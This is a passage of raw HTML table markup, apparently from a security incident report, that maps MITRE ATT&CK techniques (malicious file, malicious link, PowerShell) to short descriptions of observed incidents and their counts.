data-contrast="auto" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: windowtext; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW67619765 BCX4" data-ccp-parastyle="Table Body" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">3</span></span><span class="EOP SCXW67619765 BCX4" data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:1,&quot;335551620&quot;:1,&quot;335559738&quot;:120,&quot;335559739&quot;:120,&quot;335559740&quot;:276}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; color: windowtext; -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td></tr><tr class="TableRow SCXW67619765 BCX4" role="row" aria-rowindex="9" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; height: 19px;"><td class="FirstCol SCXW67619765 BCX4" data-celllook="4369" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 146px;"><div class="TableCellContent SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 9px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW67619765 BCX4" paraid="687804480" paraeid="{b50fc752-70a1-456b-8e3c-da667662d533}{164}" style="-webkit-user-drag: none; margin: 19.2px 0px 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: bold; font-style: normal; vertical-align: baseline; background-color: transparent; color: rgb(255, 255, 255); text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="auto" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: windowtext; font-size: 10pt; line-height: 15px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; font-weight: bold; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW67619765 BCX4" data-ccp-parastyle="Table Header" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">Execution</span></span><span class="EOP SCXW67619765 BCX4" data-ccp-props="{&quot;335559738&quot;:288}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10pt; line-height: 15px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; color: windowtext; -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td><td data-celllook="4369" class="SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 146px;"><div class="TableCellContent SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 9px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW67619765 BCX4" paraid="1124534568" paraeid="{fe8f1781-2fcc-46f1-a94d-3df5b373ac95}{133}" style="-webkit-user-drag: none; margin: 8px 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="auto" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: windowtext; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW67619765 BCX4" data-ccp-parastyle="Table Body" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">T1204.002: User Execution: Malicious File</span></span><span class="EOP SCXW67619765 BCX4" data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:1,&quot;335551620&quot;:1,&quot;335559738&quot;:120,&quot;335559739&quot;:120,&quot;335559740&quot;:276}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; color: windowtext; -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td><td data-celllook="4369" class="SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 227px;"><div class="TableCellContent SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 9px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW67619765 BCX4" paraid="400664485" paraeid="{fe8f1781-2fcc-46f1-a94d-3df5b373ac95}{140}" style="-webkit-user-drag: none; margin: 8px 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="auto" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: windowtext; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW67619765 BCX4" data-ccp-parastyle="Table Body" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">The victim downloaded a malicious installer on their personal host, connected the host to their company&#x2019;s network, transferred the malware to their primary domain controller, then executed the malware.&#xA0;</span></span><span class="EOP SCXW67619765 BCX4" data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:1,&quot;335551620&quot;:1,&quot;335559738&quot;:120,&quot;335559739&quot;:120,&quot;335559740&quot;:276}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; color: windowtext; -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td><td class="LastCol SCXW67619765 BCX4" data-celllook="4369" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 103px;"><div class="TableCellContent SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 9px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW67619765 BCX4" paraid="570715961" paraeid="{fe8f1781-2fcc-46f1-a94d-3df5b373ac95}{155}" style="-webkit-user-drag: none; margin: 8px 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="auto" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: windowtext; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW67619765 BCX4" data-ccp-parastyle="Table Body" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">3</span></span><span class="EOP SCXW67619765 BCX4" data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:1,&quot;335551620&quot;:1,&quot;335559738&quot;:120,&quot;335559739&quot;:120,&quot;335559740&quot;:276}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; color: windowtext; -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td></tr><tr class="TableRow SCXW67619765 BCX4" role="row" aria-rowindex="10" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; height: 19px;"><td class="FirstCol SCXW67619765 BCX4" data-celllook="4369" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 146px;"><div class="TableCellContent SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 9px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW67619765 BCX4" xml:lang="EN-US" lang="EN-US" paraid="731663044" paraeid="{09772ea6-c54d-4dc0-bb20-bb5c3a18251a}{212}" style="-webkit-user-drag: none; margin: 8px 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="auto" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: windowtext; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW67619765 BCX4" data-ccp-parastyle="Table Body" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;"></span></span><span class="EOP SCXW67619765 BCX4" data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:1,&quot;335551620&quot;:1,&quot;335559738&quot;:120,&quot;335559739&quot;:120,&quot;335559740&quot;:276}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; color: windowtext; -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td><td data-celllook="4369" class="SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 146px;"><div class="TableCellContent SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 9px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW67619765 BCX4" paraid="1545838236" paraeid="{fe8f1781-2fcc-46f1-a94d-3df5b373ac95}{163}" style="-webkit-user-drag: none; margin: 8px 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="auto" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: windowtext; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW67619765 BCX4" data-ccp-parastyle="Table Body" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">T1204.001: User Execution: Malicious link&#xA0;</span></span><span class="EOP SCXW67619765 BCX4" data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:1,&quot;335551620&quot;:1,&quot;335559738&quot;:120,&quot;335559739&quot;:120,&quot;335559740&quot;:276}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; color: windowtext; -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td><td data-celllook="4369" class="SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 227px;"><div class="TableCellContent SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 9px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW67619765 BCX4" paraid="1999565433" paraeid="{fe8f1781-2fcc-46f1-a94d-3df5b373ac95}{170}" style="-webkit-user-drag: none; margin: 8px 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="auto" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: windowtext; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW67619765 BCX4" data-ccp-parastyle="Table Body" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">The victim clicked on a link that led to a fake<span class="Apple-converted-space">&#xA0;</span></span><span class="NormalTextRun SCXW67619765 BCX4" data-ccp-parastyle="Table Body" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">DocuSign</span><span class="NormalTextRun SCXW67619765 BCX4" data-ccp-parastyle="Table Body" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;"><span class="Apple-converted-space">&#xA0;</span>document hosted on adobe[.]com</span></span><span class="EOP SCXW67619765 BCX4" data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:1,&quot;335551620&quot;:1,&quot;335559738&quot;:120,&quot;335559739&quot;:120,&quot;335559740&quot;:276}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; color: windowtext; -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td><td class="LastCol SCXW67619765 BCX4" data-celllook="4369" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 103px;"><div class="TableCellContent SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 9px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW67619765 BCX4" paraid="1527763567" paraeid="{fe8f1781-2fcc-46f1-a94d-3df5b373ac95}{177}" style="-webkit-user-drag: none; margin: 8px 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="auto" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: windowtext; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW67619765 BCX4" data-ccp-parastyle="Table Body" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">5</span></span><span class="EOP SCXW67619765 BCX4" data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:1,&quot;335551620&quot;:1,&quot;335559738&quot;:120,&quot;335559739&quot;:120,&quot;335559740&quot;:276}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; color: windowtext; -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td></tr><tr class="TableRow SCXW67619765 BCX4" role="row" aria-rowindex="11" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; height: 19px;"><td class="FirstCol SCXW67619765 BCX4" data-celllook="4369" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 146px;"><div class="TableCellContent SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 9px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW67619765 BCX4" xml:lang="EN-US" lang="EN-US" paraid="722585116" paraeid="{09772ea6-c54d-4dc0-bb20-bb5c3a18251a}{216}" style="-webkit-user-drag: none; margin: 8px 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="auto" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: windowtext; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW67619765 BCX4" data-ccp-parastyle="Table Body" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;"></span></span><span class="EOP SCXW67619765 BCX4" data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:1,&quot;335551620&quot;:1,&quot;335559738&quot;:120,&quot;335559739&quot;:120,&quot;335559740&quot;:276}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; color: windowtext; -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td><td data-celllook="4369" class="SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 146px;"><div class="TableCellContent SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 9px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW67619765 BCX4" paraid="2040723382" paraeid="{fe8f1781-2fcc-46f1-a94d-3df5b373ac95}{185}" style="-webkit-user-drag: none; margin: 8px 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="auto" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: windowtext; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW67619765 BCX4" data-ccp-parastyle="Table Body" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">T1059.001: Command and Scripting Interpreter: PowerShell&#xA0;</span></span><span class="EOP SCXW67619765 BCX4" data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:1,&quot;335551620&quot;:1,&quot;335559738&quot;:120,&quot;335559739&quot;:120,&quot;335559740&quot;:276}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; color: windowtext; -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td><td data-celllook="4369" class="SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 227px;"><div class="TableCellContent SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 9px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW67619765 BCX4" paraid="628898423" paraeid="{fe8f1781-2fcc-46f1-a94d-3df5b373ac95}{192}" style="-webkit-user-drag: none; margin: 8px 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="auto" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: windowtext; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW67619765 BCX4" data-ccp-parastyle="Table Body" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">The adversary used PowerShell commands and scripts for execution.</span></span><span class="EOP SCXW67619765 BCX4" data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:1,&quot;335551620&quot;:1,&quot;335559738&quot;:120,&quot;335559739&quot;:120,&quot;335559740&quot;:276}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; color: windowtext; -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td><td class="LastCol SCXW67619765 BCX4" data-celllook="4369" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 103px;"><div class="TableCellContent SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 9px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW67619765 BCX4" paraid="889707720" paraeid="{fe8f1781-2fcc-46f1-a94d-3df5b373ac95}{199}" style="-webkit-user-drag: none; margin: 8px 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="auto" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: windowtext; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW67619765 BCX4" data-ccp-parastyle="Table Body" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">4</span></span><span class="EOP SCXW67619765 BCX4" data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:1,&quot;335551620&quot;:1,&quot;335559738&quot;:120,&quot;335559739&quot;:120,&quot;335559740&quot;:276}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; color: windowtext; -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td></tr><tr class="TableRow SCXW67619765 BCX4" role="row" aria-rowindex="12" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; height: 19px;"><td class="FirstCol SCXW67619765 BCX4" data-celllook="4369" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 146px;"><div class="TableCellContent SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 9px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW67619765 BCX4" xml:lang="EN-US" lang="EN-US" paraid="1612669645" paraeid="{09772ea6-c54d-4dc0-bb20-bb5c3a18251a}{220}" style="-webkit-user-drag: none; margin: 8px 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; 